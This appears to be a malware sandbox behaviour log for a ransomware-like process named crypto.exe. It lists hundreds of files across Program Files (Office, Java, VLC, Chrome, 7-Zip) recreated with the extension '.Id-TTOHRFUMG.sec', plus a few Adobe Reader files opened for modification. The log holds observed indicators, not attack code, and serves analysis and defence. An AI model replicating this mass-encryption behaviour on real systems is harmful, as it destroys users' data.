File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00586_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.dll	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Martinique.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PSRCHSRN.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Taipei.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03257_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00192_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00792_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\MSOERES.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\az.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ja.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\huemainsubpicture2.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\sonicsptransform.ax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\dt_socket.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0294989.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\spacer_highlights.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\hy.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\content-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\LASER.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ImagingEngine.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PSRCHLTS.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENVELOPE.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105502.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsFormTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_dirac_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\CopyDisconnect.pub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-templates.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172193.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_h264_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00261_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Anchorage.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WNTER_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\XMLSDK5.CHM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\OLMAIL.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.BusinessData.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Portable Devices\sqmapi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mousedown.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285462.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPrintTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\wmlaunch.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01013_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\WMPNSSUI.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\en-US\wordpad.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\slideShow.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\zh-tw.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OIS_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_ogg_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\MoveImport.vbe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\TRANSMGR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL105.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\GIFT.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libtransform_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\otkloadr_x64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-desk.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\README.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\rmid.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PAPERS.INI.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Code_Signing_2001-4_CA.cer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_10_p010_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Adobe.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\2 Right.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281008.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02790_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART14.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\daisies.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ast.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107750.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01875_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\OCLTINT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Currie.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ga.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR38F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSLaunch.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libkate_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\spu\librss_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15277_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR34F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TWORIENT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107446.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02125_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00231_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGZIP.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBlankPage.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.PPT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\XLCALL32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01216_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14514_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSOUC_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSODCW.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSPPT.OLB.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\preloaded_data.pb.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01174_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\FAXEXT.ECF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00788_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\HideRedo.mpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185798.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21535_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234000.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Photo Viewer\ImagingEngine.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\wmpnssui.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01742_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\lgpllibs.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan.Id-TTOHRFUMG.sec	crypto.exe
